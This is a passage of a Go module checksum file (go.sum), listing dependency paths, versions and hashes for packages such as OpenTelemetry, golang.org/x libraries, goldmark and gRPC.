h1:ZTKrmejRlAJYdn0kcaFqRAKlxxFIC21pYq8vLa4p2Wc= github.com/tidwall/jsonc v0.3.2/go.mod h1:dw+3CIxqHi+t8eFSpzzMlcVYxKp08UP5CD8/uSFCyJE= github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA= github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM= github.com/tidwall/pretty v1.2.0/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= github.com/tidwall/pretty v1.2.1 h1:qjsOFOWWQl+N3RsoF5/ssm1pHmJJwhjlSbZ51I6wMl4= github.com/tidwall/pretty v1.2.1/go.mod h1:ITEVvHYasfjBbM0u2Pg8T2nJnzm8xPwvNhhsoaGGjNU= github.com/tidwall/sjson v1.2.5 h1:kLy8mja+1c9jlljvWTlSazM7cKDRfJuR/bOJhcY5NcY= github.com/tidwall/sjson v1.2.5/go.mod h1:Fvgq9kS/6ociJEDnK0Fk1cpYF4FIW6ZF7LAe+6jwd28= github.com/tink-crypto/tink-go/v2 v2.4.0 h1:8VPZeZI4EeZ8P/vB6SIkhlStrJfivTJn+cQ4dtyHNh0= github.com/tink-crypto/tink-go/v2 v2.4.0/go.mod h1:l//evrF2Y3MjdbpNDNGnKgCpo5zSmvUvnQ4MU+yE2sw= github.com/tklauser/go-sysconf v0.3.15 h1:VE89k0criAymJ/Os65CSn1IXaol+1wrsFHEB8Ol49K4= github.com/tklauser/go-sysconf v0.3.15/go.mod h1:Dmjwr6tYFIseJw7a3dRLJfsHAMXZ3nEnL/aZY+0IuI4= github.com/tklauser/numcpus v0.10.0 h1:18njr6LDBk1zuna922MgdjQuJFjrdppsZG60sHGfjso= github.com/tklauser/numcpus v0.10.0/go.mod h1:BiTKazU708GQTYF4mB+cmlpT2Is1gLk7XVuEeem8LsQ= github.com/tonistiigi/go-csvvalue v0.0.0-20240814133006-030d3b2625d0 h1:2f304B10LaZdB8kkVEaoXvAMVan2tl9AiK4G0odjQtE= github.com/tonistiigi/go-csvvalue v0.0.0-20240814133006-030d3b2625d0/go.mod h1:278M4p8WsNh3n4a1eqiFcV2FGk7wE5fwUpUom9mK9lE= github.com/ulikunitz/xz v0.5.15 h1:9DNdB5s+SgV3bQ2ApL10xRc35ck0DuIX/isZvIk+ubY= github.com/ulikunitz/xz v0.5.15/go.mod h1:nbz6k7qbPmH4IRqmfOplQw/tblSgqTqBwxkY0oWt/14= github.com/urfave/cli/v3 v3.7.0 h1:AGSnbUyjtLiM+WJUb4dzXKldl/gL+F8OwmRDtVr6g2U= github.com/urfave/cli/v3 v3.7.0/go.mod h1:ysVLtOEmg2tOy6PknnYVhDoouyC/6N42TMeoMzskhso= github.com/vbatts/tar-split v0.12.1 h1:CqKoORW7BUWBe7UL/iqTVvkTBOF8UvOMKOIZykxnnbo= github.com/vbatts/tar-split v0.12.1/go.mod h1:eF6B6i6ftWQcDqEn3/iGFRFRo8cBIMSJVOpnNdfTMFA= github.com/xanzy/ssh-agent v0.3.3 h1:+/15pJfg/RsTxqYcX6fHqOXZwwMP+2VyYWJeWM2qQFM= github.com/xanzy/ssh-agent v0.3.3/go.mod h1:6dzNDKs0J9rVPHPhaGCukekBHKqfl+L3KghI1Bc68Uw= github.com/xeipuuv/gojsonpointer v0.0.0-20180127040702-4e3ac2762d5f/go.mod h1:N2zxlSyiKSe5eX1tZViRH5QA0qijqEDrYZiPEAiq3wU= github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb h1:zGWFAtiMcyryUHoUjUJX0/lt1H2+i2Ka2n+D3DImSNo= github.com/xeipuuv/gojsonpointer v0.0.0-20190905194746-02993c407bfb/go.mod h1:N2zxlSyiKSe5eX1tZViRH5QA0qijqEDrYZiPEAiq3wU= github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415 h1:EzJWgHovont7NscjpAxXsDA8S8BMYve8Y5+7cuRE7R0= github.com/xeipuuv/gojsonreference v0.0.0-20180127040603-bd5ef7bd5415/go.mod h1:GwrjFmJcFw6At/Gs6z4yjiIwzuJ1/+UwLxMQDVQXShQ= github.com/xeipuuv/gojsonschema v1.2.0 h1:LhYJRs+L4fBtjZUfuSZIKGeVu0QRy8e5Xi7D17UxZ74= github.com/xeipuuv/gojsonschema v1.2.0/go.mod h1:anYRn/JVcOK2ZgGU+IjEV4nwlhoK5sQluxsYJ78Id3Y= github.com/xhit/go-str2duration/v2 v2.1.0 h1:lxklc02Drh6ynqX+DdPyp5pCKLUQpRT8bp8Ydu2Bstc= github.com/xhit/go-str2duration/v2 v2.1.0/go.mod h1:ohY8p+0f07DiV6Em5LKB0s2YpLtXVyJfNt1+BlmyAsU= github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e h1:JVG44RsyaB9T2KIHavMF/ppJZNG9ZpyihvCd0w101no= github.com/xo/terminfo v0.0.0-20220910002029-abceb7e1c41e/go.mod h1:RbqR21r5mrJuqunuUZ/Dhy/avygyECGrLceyNeo4LiM= github.com/yosida95/uritemplate/v3 v3.0.2 h1:Ed3Oyj9yrmi9087+NczuL5BwkIc4wvTb5zIM+UJPGz4= github.com/yosida95/uritemplate/v3 v3.0.2/go.mod h1:ILOh0sOhIJR3+L/8afwt/kE++YT040gmv5BQTMR2HP4= github.com/yuin/goldmark v1.1.27/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= github.com/yuin/goldmark v1.7.12 h1:YwGP/rrea2/CnCtUHgjuolG/PnMxdQtPMO5PvaE2/nY= github.com/yuin/goldmark v1.7.12/go.mod h1:ip/1k0VRfGynBgxOz0yCqHrbZXhcjxyuS66Brc7iBKg= github.com/yuin/goldmark-emoji v1.0.6 h1:QWfF2FYaXwL74tfGOW5izeiZepUDroDJfWubQI9HTHs= github.com/yuin/goldmark-emoji v1.0.6/go.mod h1:ukxJDKFpdFb5x0a5HqbdlcKtebh086iJpI31LTKmWuA= github.com/yusufpapurcu/wmi v1.2.4 h1:zFUKzehAFReQwLys1b/iSMl+JQGSCSjtVqQn9bBrPo0= github.com/yusufpapurcu/wmi v1.2.4/go.mod h1:SBZ9tNy3G9/m5Oi98Zks0QjeHVDvuK0qfxQmPyzfmi0= go.etcd.io/bbolt v1.4.2 h1:IrUHp260R8c+zYx/Tm8QZr04CX+qWS5PGfPdevhdm1I= go.etcd.io/bbolt v1.4.2/go.mod h1:Is8rSHO/b4f3XigBC0lL0+4FwAQv3HXEEIgFMuKHceM= go.opencensus.io v0.24.0 h1:y73uSU6J157QMP2kn2r30vwW1A2W2WFwSCGnAVxeaD0= go.opencensus.io v0.24.0/go.mod h1:vNK8G9p7aAivkbmorf4v+7Hgx+Zs0yY+0fOtgBfjQKo= go.opentelemetry.io/auto/sdk v1.2.1 h1:jXsnJ4Lmnqd11kwkBV2LgLoFMZKizbCi5fNZ/ipaZ64= go.opentelemetry.io/auto/sdk v1.2.1/go.mod h1:KRTj+aOaElaLi+wW1kO/DZRXwkF4C5xPbEe3ZiIhN7Y= go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 h1:Hf9xI/XLML9ElpiHVDNwvqI0hIFlzV8dgIr35kV1kRU= go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0/go.mod h1:NfchwuyNoMcZ5MLHwPrODwUF1HWCXWrL31s8gSAdIKY= go.opentelemetry.io/otel v1.39.0 h1:8yPrr/S0ND9QEfTfdP9V+SiwT4E0G7Y5MO7p85nis48= go.opentelemetry.io/otel v1.39.0/go.mod h1:kLlFTywNWrFyEdH0oj2xK0bFYZtHRYUdv1NklR/tgc8= go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.35.0 h1:1fTNlAIJZGWLP5FVu0fikVry1IsiUnXjf7QFvoNN3Xw= go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.35.0/go.mod h1:zjPK58DtkqQFn+YUMbx0M2XV3QgKU0gS9LeGohREyK4= go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.35.0 h1:xJ2qHD0C1BeYVTLLR9sX12+Qb95kfeD/byKj6Ky1pXg= go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.35.0/go.mod h1:u5BF1xyjstDowA1R5QAO9JHzqK+ublenEW/dyqTjBVk= go.opentelemetry.io/otel/metric v1.39.0 h1:d1UzonvEZriVfpNKEVmHXbdf909uGTOQjA0HF0Ls5Q0= go.opentelemetry.io/otel/metric v1.39.0/go.mod h1:jrZSWL33sD7bBxg1xjrqyDjnuzTUB0x1nBERXd7Ftcs= go.opentelemetry.io/otel/sdk v1.39.0 h1:nMLYcjVsvdui1B/4FRkwjzoRVsMK8uL/cj0OyhKzt18= go.opentelemetry.io/otel/sdk v1.39.0/go.mod h1:vDojkC4/jsTJsE+kh+LXYQlbL8CgrEcwmt1ENZszdJE= go.opentelemetry.io/otel/sdk/metric v1.39.0 h1:cXMVVFVgsIf2YL6QkRF4Urbr/aMInf+2WKg+sEJTtB8= go.opentelemetry.io/otel/sdk/metric v1.39.0/go.mod h1:xq9HEVH7qeX69/JnwEfp6fVq5wosJsY1mt4lLfYdVew= go.opentelemetry.io/otel/trace v1.39.0 h1:2d2vfpEDmCJ5zVYz7ijaJdOF59xLomrvj7bjt6/qCJI= go.opentelemetry.io/otel/trace v1.39.0/go.mod h1:88w4/PnZSazkGzz/w84VHpQafiU4EtqqlVdxWy+rNOA= go.opentelemetry.io/proto/otlp v1.5.0 h1:xJvq7gMzB31/d406fB8U5CBdyQGw4P399D1aQWU/3i4= go.opentelemetry.io/proto/otlp v1.5.0/go.mod h1:keN8WnHxOy8PG0rQZjJJ5A2ebUoafqWp0eVQ4yIXvJ4= go.uber.org/atomic v1.7.0 h1:ADUqmZGgLDDfbSL9ZmPxKTybcoEYHgpYfELNoN+7hsw= go.uber.org/atomic v1.7.0/go.mod h1:fEN4uk6kAWBTFdckzkM89CLk9XfWZrxpCo0nPH17wJc= go.uber.org/multierr v1.6.0/go.mod h1:cdWPpRnG4AhwMwsgIHip0KRBQjJy5kYEpYjJxpXp9iU= go.uber.org/multierr v1.11.0 h1:blXXJkSxSSfBVBlC76pxqeO+LN3aDfLQo+309xJstO0= go.uber.org/multierr v1.11.0/go.mod h1:20+QtiLqy0Nd6FdQB9TLXag12DsQkrbs3htMFfDN80Y= go.uber.org/zap v1.17.0 h1:MTjgFu6ZLKvY6Pvaqk97GlxNBuMpV4Hy/3P6tRGlI2U= go.uber.org/zap v1.17.0/go.mod h1:MXVU+bhUf/A7Xi2HNOnopQOrmycQ5Ih87HtOu4q5SSo= go.yaml.in/yaml/v2 v2.4.2 h1:DzmwEr2rDGHl7lsFgAHxmNz/1NlQ7xLIrlN2h5d1eGI= go.yaml.in/yaml/v2 v2.4.2/go.mod h1:081UH+NErpNdqlCXm3TtEran0rJZGxAYx9hb/ELlsPU= go.yaml.in/yaml/v3 v3.0.4 h1:tfq32ie2Jv2UxXFdLJdh3jXuOzWiL1fo0bu/FbuKpbc= go.yaml.in/yaml/v3 v3.0.4/go.mod h1:DhzuOOF2ATzADvBadXxruRBLzYTpT36CKvDb3+aBEFg= go.yaml.in/yaml/v4 v4.0.0-rc.4 h1:UP4+v6fFrBIb1l934bDl//mmnoIZEDK0idg1+AIvX5U= go.yaml.in/yaml/v4 v4.0.0-rc.4/go.mod h1:aZqd9kCMsGL7AuUv/m/PvWLdg5sjJsZ4oHDEnfPPfY0= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI= golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/crypto v0.0.0-20220622213112-05595931fe9d/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4= golang.org/x/crypto v0.48.0 h1:/VRzVqiRSggnhY7gNRxPauEQ5Drw9haKdM0jqfcCFts= golang.org/x/crypto v0.48.0/go.mod h1:r0kV5h3qnFPlQnBSrULhlsRfryS2pmewsg+XfMgkVos= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20250711185948-6ae5c78190dc h1:TS73t7x3KarrNd5qAipmspBDS1rkMcgVG/fS1aRb4Rc= golang.org/x/exp v0.0.0-20250711185948-6ae5c78190dc/go.mod h1:A+z0yzpGtvnG90cToK5n2tu8UJVP2XUATh+r+sfOOOc= golang.org/x/lint v0.0.0-20181026193005-c67002cb31c3/go.mod h1:UVdnD1Gm6xHRNCYTkRU2/jEulfH38KcIWyp/GAMgvoE= golang.org/x/lint v0.0.0-20190227174305-5b3e6a55c961/go.mod h1:wehouNa3lNwaWXcvxsM5YxQ5yQlVC4a0KAMCusXpPoU= golang.org/x/lint v0.0.0-20190313153728-d0100b6bd8b3/go.mod h1:6SW0HCj/g11FgYtHlgUYUwCkIfeOF89ocIRzGO/8vkc= golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/mod v0.32.0 h1:9F4d3PHLljb6x//jOyokMv3eX+YDeepZSEo3mFJy93c= golang.org/x/mod v0.32.0/go.mod h1:SgipZ/3h2Ci89DlEtEXWUk/HteuRin+HHhN+WbNhguU= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190213061140-3a22650c66bd/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190311183353-d8887717615a/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20190827160401-ba9fcec4b297/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200226121028-0de0cce0169b/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20200501053045-e0ff5e5a1de5/go.mod h1:qpuaurCH72eLCgpAm/N6yyVIVM9cpaDIP3A8BGJEC5A= golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20201110031124-69a78807bb2b/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20211112202133-69e39bad7dc2/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/net v0.51.0 h1:94R/GTO7mt3/4wIKpcR5gkGmRLOuE/2hNGeWq/GBIFo= golang.org/x/net v0.51.0/go.mod h1:aamm+2QF5ogm02fjy5Bb7CQ0WMt1/WVM7FtyaTLlA9Y= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.34.0 h1:hqK/t4AKgbqWkdkcAeI8XLmbK+4m4G5YeQRrmiotGlw= golang.org/x/oauth2 v0.34.0/go.mod h1:lzm5WQJQwKZ3nwavOZ3IS5Aulzxi68dUSgRHujetwEA= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20181108010431-42b317875d0f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.20.0 h1:e0PTpb7pjO8GAtTs2dQ6jYa5BWYlMuX047Dco/pItO4= golang.org/x/sync v0.20.0/go.mod h1:9xrNwdLfx4jkKbNva9FpL6vEN7evnE43NNNJQ2LF3+0= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20190916202348-b4ddaad3f8a3/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200323222414-85ca7c5b95cd/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20211216021012-1d35b9e2eb4e/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220408201424-a24fb2fb8a0f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220615213510-4f61da869c0c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.42.0 h1:omrd2nAlyT5ESRdCLYdm3+fMfNFE/+Rf4bDIQImRJeo= golang.org/x/sys v0.42.0/go.mod h1:4GL1E5IUh+htKOUEOaiffhrAeqysfVGipDYzABqnCmw= golang.org/x/telemetry v0.0.0-20260109210033-bd525da824e2 h1:O1cMQHRfwNpDfDJerqRoE2oD+AFlyid87D40L/OkkJo= golang.org/x/telemetry v0.0.0-20260109210033-bd525da824e2/go.mod h1:b7fPSJ0pKZ3ccUh8gnTONJxhn3c/PS6tyzQvyqw4iA8= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/term v0.40.0 h1:36e4zGLqU4yhjlmxEaagx2KuYbJq3EwY8K943ZsHcvg= golang.org/x/term v0.40.0/go.mod h1:w2P8uVp06p2iyKKuvXIm7N/y0UCRt3UfJTfZ7oOpglM= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/text v0.34.0 h1:oL/Qq0Kdaqxa1KbNeMKwQq0reLCCaFtqu2eNuSeNHbk= golang.org/x/text v0.34.0/go.mod h1:homfLqTYRFyVYemLBFl5GgL/DWEiH5wcsQ5gSh1yziA= golang.org/x/time v0.12.0 h1:ScB/8o8olJvc+CQPWrK3fPZNfh7qgwCrY0zJmoEQLSE= golang.org/x/time v0.12.0/go.mod h1:CDIdPxbZBQxdj6cxyCIdrNogrJKMJ7pr37NYpMcMDSg= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190226205152-f727befe758c/go.mod h1:9Yl7xja0Znq3iFh3HoIrodX9oNMXvdceNzlUR8zjMvY= golang.org/x/tools v0.0.0-20190311212946-11955173bddd/go.mod h1:LCzVGOaR6xXOjkQ3onu1FJEFr0SW1gC7cKk1uF8kGRs= golang.org/x/tools v0.0.0-20190524140312-2c0ae7006135/go.mod h1:RgjU9mgBXZiqYHBnxXauZ1Gv1EHHAz9KjViQ78xBX0Q= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE= golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/tools v0.41.0 h1:a9b8iMweWG+S0OBnlU36rzLp20z1Rp10w+IY2czHTQc= golang.org/x/tools v0.41.0/go.mod h1:XSY6eDqxVNiYgezAVqqCeihT4j1U2CCsqvH3WhQpnlg= golang.org/x/tools/go/expect v0.1.0-deprecated h1:jY2C5HGYR5lqex3gEniOQL0r7Dq5+VGVgY1nudX5lXY= golang.org/x/tools/go/expect v0.1.0-deprecated/go.mod h1:eihoPOH+FgIqa3FpoTwguz/bVUSGBlGQU67vpBeOrBY= golang.org/x/tools/go/packages/packagestest v0.1.1-deprecated h1:1h2MnaIAIXISqTFKdENegdpAgUXz6NrPEsbIeWaBRvM= golang.org/x/tools/go/packages/packagestest v0.1.1-deprecated/go.mod h1:RVAQXBGNv1ib0J382/DPCRS/BPnsGebyM1Gj5VSDpG8= golang.org/x/vuln v1.1.4 h1:Ju8QsuyhX3Hk8ma3CesTbO8vfJD9EvUBgHvkxHBzj0I= golang.org/x/vuln v1.1.4/go.mod h1:F+45wmU18ym/ca5PLTPLsSzr2KppzswxPP603ldA67s= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20200804184101-5ec99f83aff1/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da h1:noIWHXmPHxILtqtCOPIhSt0ABwskkZKjD3bXGnZGpNY= golang.org/x/xerrors v0.0.0-20240903120638-7835f813f4da/go.mod h1:NDW/Ps6MPRej6fsCIbMTohpP40sJ/P/vI1MoTEGwX90= gonum.org/v1/gonum v0.16.0 h1:5+ul4Swaf3ESvrOnidPp4GZbzf0mxVQpDCYUQE7OJfk= gonum.org/v1/gonum v0.16.0/go.mod h1:fef3am4MQ93R2HHpKnLk4/Tbh/s0+wqD5nfa6Pnwy4E= google.golang.org/appengine v1.1.0/go.mod h1:EbEs0AVv82hx2wNQdGPgUI5lhzA/G0D9YwlJXL52JkM= google.golang.org/appengine v1.4.0/go.mod h1:xpcJRLb0r/rnEns0DIKYYv+WjYCduHsrkT7/EB5XEv4= google.golang.org/genproto v0.0.0-20180817151627-c66870c02cf8/go.mod h1:JiN7NxoALGmiZfu7CAH4rXhgtRTLTxftemlI0sWmxmc= google.golang.org/genproto v0.0.0-20190819201941-24fa4b261c55/go.mod h1:DMBHOl98Agz4BDEuKkezgsaosCRResVns1a3J2ZsMNc= google.golang.org/genproto v0.0.0-20200526211855-cb27e3aa2013/go.mod h1:NbSheEEYHJ7i3ixzK3sjbqSGDJWnxyFXZblF3eUsNvo= google.golang.org/genproto v0.0.0-20250707201910-8d1bb00bc6a7 h1:FGOcxvKlJgRBVbXeugjljCfCgfKWhC42FBoYmTCWVBs= google.golang.org/genproto v0.0.0-20250707201910-8d1bb00bc6a7/go.mod h1:249YoW4b1INqFTEop2T4aJgiO7UBYJrpejsaLvjWfI8= google.golang.org/genproto/googleapis/api v0.0.0-20260226221140-a57be14db171 h1:tu/dtnW1o3wfaxCOjSLn5IRX4YDcJrtlpzYkhHhGaC4= google.golang.org/genproto/googleapis/api v0.0.0-20260226221140-a57be14db171/go.mod h1:M5krXqk4GhBKvB596udGL3UyjL4I1+cTbK0orROM9ng= google.golang.org/genproto/googleapis/rpc v0.0.0-20260217215200-42d3e9bedb6d h1:t/LOSXPJ9R0B6fnZNyALBRfZBH0Uy0gT+uR+SJ6syqQ= google.golang.org/genproto/googleapis/rpc v0.0.0-20260217215200-42d3e9bedb6d/go.mod h1:4Hqkh8ycfw05ld/3BWL7rJOSfebL2Q+DVDeRgYgxUU8= google.golang.org/grpc v1.19.0/go.mod h1:mqu4LbDTu4XGKhr4mRzUsmM4RtVoemTSY81AxZiDr8c= google.golang.org/grpc v1.23.0/go.mod h1:Y5yQAOtifL1yxbo5wqy6BxZv8vAUGQwXBOALyacEbxg= google.golang.org/grpc v1.25.1/go.mod h1:c3i+UQWmh7LiEpx4sFZnkU36qjEYZ0imhYfXVyQciAY= google.golang.org/grpc v1.27.0/go.mod h1:qbnxyOmOxrQa7FizSgH+ReBfzJrCY1pSN7KXBS8abTk= google.golang.org/grpc v1.33.2/go.mod h1:JMHMWHQWaTccqQQlmk3MJZS+GWXOdAesneDmEnv2fbc= 